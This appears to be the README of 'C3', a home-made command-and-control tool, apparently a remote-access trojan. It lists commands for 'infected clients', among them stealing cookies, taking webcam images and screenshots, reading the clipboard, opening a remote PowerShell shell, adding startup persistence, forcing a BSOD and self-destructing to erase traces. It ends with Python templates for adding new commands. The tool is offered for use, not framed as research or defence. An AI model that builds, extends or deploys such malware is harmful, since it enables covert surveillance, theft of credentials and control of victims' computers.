Customize, Command & Control.
Called it 'C3' because 'C2' is taken by my previous attempt at a command and control server, which used HTTP requests in a web-gui. (also because this project is much more customizable)
I started a new project because the old project gave me lung cancer from breathing in all of the shit code.
kill_proc: Kills a process on the client
launch_exe: Launches an executable file on the client
invoke_bsod: Invokes a BSOD on the client
show_image: Displays an image on the clients screen
screenshot: Captures a screenshot on client
typewrite: Types a string on the clients keyboard
run_command: Runs a command on the client
webcam_img: Captures an image from the clients webcam
add_persistence: Adds the client infection to PC startup
reboot: Reboots the client PC
shutdown: Turns off the client PC
self_destruct: Self destructs and removes all trace of infection on the client side
steal_cookies: Downloads cookies from the client
upload: Uploads a file or folder to the client
download: Downloads a file or folder from the client
open_url: Opens a URL in a new webbrowser on the client
ls: Lists items in a client side directory
mkdir: Creates a directory on the client
rmdir: Recursively removes a directory on the client
del: Deletes a file on the client
touch: Creates a file on the client
list_procs: Lists the running processes on the client
chdir: Changes the clients current working directory (CWD)
clipboard_set: Sets the clipboard value on the client
clipboard_get: Gets the clipboard value on the client
popup: Displays a popup message on the clients screen
sysinfo: Gathers information from the client computer
ipinfo: Gets information about the client IP
shell: Launches a powershell instance for interaction
playsound: Plays a local sound file on the client
exit: Removes all clients and exits
list_clients: Lists your infected clients
remove_client: Kills and removes a client
rename_client: Renames a client
clear: Clears the console
select: Selects a client for command execution
deselect: Deselects a client
help: Displays help about command(s)
External modules (such as threading, random, etc...) should be imported inside the function where they are used.
Double commands should be implemented in the shared/double_commands.py file, since the required imports for creating a double command is already imported.
In an actual double command you would catch potential errors in the server_side and return them like this:
return CommandResult(DoubleCommandResult.your_error_here)
Here is how you can implement a custom double command:
@add_double_command(
"my_double_command",
"Usage [ required argument ] { optional argument }",
"A cool double command!",
argument_types=[
ArgumentType.integer,
ArgumentType.optional_string,
]
)
class MyDoubleCommand(DoubleCommand):
@staticmethod
def client_side(sock):
data = sock.recv(512)
print(data.decode())
@staticmethod
def server_side(client, params):
client.socket.sendall(f"(required) Integer argument (1): {params[0]}\n".encode())
if len(params) == 2:
client.socket.sendall(f"(optional) String argument (2): {params[1]}\n".encode())
return CommandResult(DoubleCommandResult.success)Local commands should be implemented in the server_extras/local_commands.py file, since the required imports for creating a local command is already imported.
In an actual local command you would catch potential errors in the local_side and return them like this:
return CommandResult(LocalCommandResult.your_error_here)
Here is how you can implement a custom local command:
@add_local_command(
"my_local_command",
"Usage [ required argument ] { optional argument }",
"A cool local command!",
argument_types=[
ArgumentType.integer,
ArgumentType.optional_string,
]
)
class MyLocalCommand(LocalCommand):
@staticmethod
def local_side(server_thread, params):
print(f"(required) Integer argument (1): {params[0]}")
if len(params) == 2:
print(f"(optional) String argument (2): {params[1]}")
return CommandResult(LocalCommandResult.success)